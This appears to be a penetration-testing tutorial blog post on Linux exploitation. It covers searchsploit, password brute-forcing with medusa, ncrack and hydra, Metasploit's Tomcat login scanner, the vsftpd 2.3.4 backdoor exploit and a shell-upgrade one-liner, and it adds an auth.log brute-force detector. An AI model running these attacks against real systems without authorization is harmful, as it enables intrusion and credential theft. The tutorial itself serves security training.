Approaches to Linux Exploitation
Introduction
In this blog post we will look at various approaches to exploiting a Linux target and gaining remote access.
Having identified vulnerabilities in the previous phases, we will now exploit them to access the target remotely.
The basic approaches to exploiting the target network:
- What services are running on the target network?
- What are the versions of the running services?
- Are they affected by any public CVE?
- Is a public exploit available for those services?
- Did we find any potential vulnerability in our previous phases?
- Did we find any sensitive information?
- Did we find any credentials in previous phases?
- Is there any web application vulnerability that gives system-level access?
- Does the website also have an admin panel/dashboard, or any other running service, that is exploitable?
There may be more approaches, depending on the skills of the pentester and the pentesting scope and scenarios.
Searchsploit
Searchsploit is used to find exploits for exploitable network services and web services on the target network.
It allows searching through the exploits and shellcodes from Exploit-DB using one or more terms.
Installing Searchsploit
# apt update && apt -y install exploitdb
After installing it, you can use it right away, for example:
searchsploit Linux kernel 3.2
Let's use it to find exploits for the Linux kernel:
$ searchsploit linux kernel 4. | head
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
BSD/Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3. | bsd/dos/19423.c
HP-UX 11 / Linux Kernel 2.4 / Windows 2000/NT | multiple/dos/20997.c
Linux 4.18 - Arbitrary Kernel Read into dmesg | linux/dos/45405.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14. | linux_x86-64/local/42275.c
Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/ | linux_x86/local/42274.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16 | linux_x86/local/42276.c
Linux Kernel (PonyOS 4.0) - 'fluttershy' LD_L | linux/local/41875.py
Suppose the target is running Apache 5.3; let's check the available exploits for this service:
$ searchsploit apache 5.3 | head
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Rem | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Rem | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code | php/remote/29316.py
Apache ActiveMQ 5.2/5.3 - Source Code Informa | multiple/remote/33868.txt
Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cro | multiple/remote/33905.txt
Apache Tomcat < 5.5.17 - Remote Directory Lis | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Tra | multiple/remote/6229.txt
To get the Exploit-DB URL for each exploit, simply add -w:
$ searchsploit -w apache 5.3 | head
----------------------------------- --------------------------------------------
Exploit Title | URL
----------------------------------- --------------------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - | https://www.exploit-db.com/exploits/29290
Apache + PHP < 5.3.12 / < 5.4.2 - | https://www.exploit-db.com/exploits/29290
Apache + PHP < 5.3.12 / < 5.4.2 - | https://www.exploit-db.com/exploits/29316
Apache ActiveMQ 5.2/5.3 - Source C | https://www.exploit-db.com/exploits/33868
Apache ActiveMQ 5.3 - 'admin/queue | https://www.exploit-db.com/exploits/33905
Apache Tomcat < 5.5.17 - Remote Di | https://www.exploit-db.com/exploits/2061
Apache Tomcat < 6.0.18 - 'utf8' Di | https://www.exploit-db.com/exploits/14489
In this way you can easily find exploits for a particular vulnerability, and many of these exploits come with PoCs that walk you step by step through running them against the target.
Exploiting Lower Hanging Fruits
Lower Hanging Fruits (LHF) exploitation is the process of leveraging the findings of your previous phases to exploit the target system.
This approach also saves the pentester time and effort.
Lower hanging fruits means:
- Misconfigured servers
- Unimplemented or badly implemented ACLs
- Default or weak passwords (easily guessable)
- Open SMB shares / null sessions
- Broadcast requests
- Vulnerabilities with public exploits
- Etc.
We covered some of these earlier, so this is the right time to recall them.
Using Medusa to Exploit LHF
Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services that allow remote authentication as possible.
Read the medusa manual:
$ man medusa
To see the usage of medusa:
$ medusa -h
To list the available medusa modules:
$ medusa -d
You will see there are many modules; to learn about a specific module:
$ medusa -M ftp -q
This prints everything about the ftp module.
To attack the target with medusa we first need a wordlist, which we can generate with tools such as cewl or cupp, or build by hand by guessing the naming convention from the target's services and running web applications.
Basic usage of medusa:
$ medusa -h <targetIp> -M ftp -U usernames.txt -P passwords.txt
Ncrack
Ncrack is designed for companies and security professionals to audit large networks for default or weak passwords rapidly and reliably. It can also be used to conduct fairly sophisticated and intensive brute force attacks against individual services.
Ncrack also ships with its own wordlists; to list them:
$ ls -l /usr/share/ncrack/
total 904
-rw-r--r-- 1 root root 5754 Aug 28 2019 common.usr
-rw-r--r-- 1 root root 47070 Aug 28 2019 default.pwd
-rw-r--r-- 1 root root 3451 Aug 28 2019 default.usr
-rw-r--r-- 1 root root 22414 Aug 28 2019 jtr.pwd
-rw-r--r-- 1 root root 266 Aug 28 2019 minimal.usr
-rw-r--r-- 1 root root 356352 Aug 28 2019 myspace.pwd
-rw-r--r-- 1 root root 748 Aug 28 2019 ncrack-services
-rw-r--r-- 1 root root 58472 Aug 28 2019 phpbb.pwd
-rw-r--r-- 1 root root 410725 Aug 28 2019 top50000.pwd
ncrack -h
To specify a target:
ncrack 10.10.10.180
ncrack me.hacker.com
Ncrack supports FTP, Telnet, SSH, HTTP/HTTPS, POP3(S), SMB, RDP and VNC.
USAGE:
ncrack <service_name>://target:<port_number>
Let's target ssh:
ncrack ssh 10.10.10.135
We can also specify the port, supposing ssh is running on port 187:
ncrack ssh://10.10.10.135:187
Using hydra to exploit weak passwords
hydra is a very fast network logon cracker which supports many different services.
Usage:
$ hydra -h
-L - list of usernames
-P - list of passwords
hydra -L users.txt -P passwords.txt ssh://10.10.10.135
To generate custom wordlists there are many tools available, such as cewl (available in Parrot OS), Mentalist and Rsmangler.
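The defender-side counterpart to the password-guessing tools above (medusa, ncrack and hydra, and later the tomcat_mgr_login module): an added Python example, not from the original post, that parses sshd auth.log entries and flags a source that produces many failed logins within a short window, recording whether a successful login followed. The log lines are constructed for this example; the hostnames, addresses and threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample auth.log lines (not a real capture): a burst of failed
# logins from one source, then a success, plus ordinary traffic from another.
SAMPLE_AUTH_LOG = """\
Mar  3 10:00:01 web01 sshd[2101]: Failed password for invalid user admin from 10.10.10.5 port 51122 ssh2
Mar  3 10:00:01 web01 sshd[2103]: Failed password for invalid user test from 10.10.10.5 port 51124 ssh2
Mar  3 10:00:02 web01 sshd[2105]: Failed password for root from 10.10.10.5 port 51126 ssh2
Mar  3 10:00:02 web01 sshd[2107]: Failed password for root from 10.10.10.5 port 51128 ssh2
Mar  3 10:00:03 web01 sshd[2109]: Failed password for invalid user oracle from 10.10.10.5 port 51130 ssh2
Mar  3 10:00:03 web01 sshd[2111]: Accepted password for root from 10.10.10.5 port 51132 ssh2
Mar  3 10:05:00 web01 sshd[2200]: Failed password for alice from 192.168.1.20 port 40000 ssh2
Mar  3 10:06:00 web01 sshd[2201]: Accepted publickey for alice from 192.168.1.20 port 40001 ssh2
"""
# sshd password/publickey outcome lines in the default syslog format.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

def parse_line(line, year=2024):
    """Return a dict for an sshd auth line, or None for anything else."""
    m = LINE_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Map source IP -> summary for sources with >= threshold failed logins in
    any sliding window; success_after = that source later authenticated."""
    by_ip = defaultdict(list)
    for e in filter(None, map(parse_line, log_text.splitlines())):
        by_ip[e["ip"]].append(e)
    alerts = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e["result"] == "Failed"]
        start = 0
        for end in range(len(fails)):
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1  # slide the window forward past old failures
            if end - start + 1 >= threshold:
                last = fails[end]["ts"]
                alerts[ip] = {"failures": len(fails),
                              "users": sorted({f["user"] for f in fails}),
                              "success_after": any(e["result"] == "Accepted" and e["ts"] >= last for e in evs)}
                break
    return alerts
```

A source that trips the threshold and then shows success_after is the case to act on first, since a guessed credential is now in use.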
Exploitation
Exploitation is the process of taking advantage of the target's vulnerabilities to get remote access to the target system and leveraging that access to perform malicious activities on it.
Having found vulnerabilities in the target system, we now proceed to exploit them.
Using Metasploit to exploit a target vulnerability and get a meterpreter shell
Using our previous findings, we will now exploit them in Metasploit.
Suppose you found that the target is running an Apache Tomcat 5.5 server.
Search for the exploits available on Exploit-DB:
searchsploit -w apache tomcat 5.5
----------------------------------- --------------------------------------------
Exploit Title | URL
----------------------------------- --------------------------------------------
Apache Tomcat 5.5.0 < 5.5.29 / 6.0 | https://www.exploit-db.com/exploits/12343
Apache Tomcat 5.5.15 - cal2.jsp Cr | https://www.exploit-db.com/exploits/30563
Apache Tomcat 5.5.25 - Cross-Site | https://www.exploit-db.com/exploits/29435
Apache Tomcat < 5.5.17 - Remote Di | https://www.exploit-db.com/exploits/2061
Apache Tomcat < 6.0.18 - 'utf8' Di | https://www.exploit-db.com/exploits/14489
Apache Tomcat < 6.0.18 - 'utf8' Di | https://www.exploit-db.com/exploits/6229
Apache Tomcat < 9.0.1 (Beta) / < 8 | https://www.exploit-db.com/exploits/42953
Apache Tomcat < 9.0.1 (Beta) / < 8 | https://www.exploit-db.com/exploits/42966
You have two choices: you can download the exploit directly from Exploit-DB and run it to gain unauthorized access to the target,
or use Metasploit to do the task for you.
First, start with password guessing, since it is a low hanging fruit.
# msfconsole
# search tomcat_mgr_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/tomcat_mgr_login normal No Tomcat Application Manager Login Utility
msf5 > use auxiliary/scanner/http/tomcat_mgr_login
msf5 auxiliary(scanner/http/tomcat_mgr_login) >
Using the 'show options' command we can see the required options to set.
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhost 10.10.10.150
rhost => 10.10.10.150
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
rport => 8180
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8080
rport => 8080
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf5 auxiliary(scanner/http/tomcat_mgr_login) > run
This will run and give us the desired result.
After obtaining credentials you can log in to the Apache Tomcat manager and will be able to perform malicious actions.
We can also use the previous techniques.
Exploiting a vsftpd 2.3.4 server using Metasploit
> search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Select the module with 'use exploit/unix/ftp/vsftpd_234_backdoor' and view its options:
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
Set the options:
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 10.10.10.158
RHOST => 10.10.10.158
The port is already set to 21.
Then simply use the run or exploit command:
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
It will execute and, if successful, give you a meterpreter shell.
To get a proper shell on the target, use the 'shell' command in meterpreter.
If you don't have a proper TTY shell, you can use a Python one-liner to spawn one:
python -c 'import pty; pty.spawn("/bin/sh")'
Conclusion
In this blog post we have learned some basic approaches to exploiting a target; some of them, like lower hanging fruit, apply to Windows targets as well.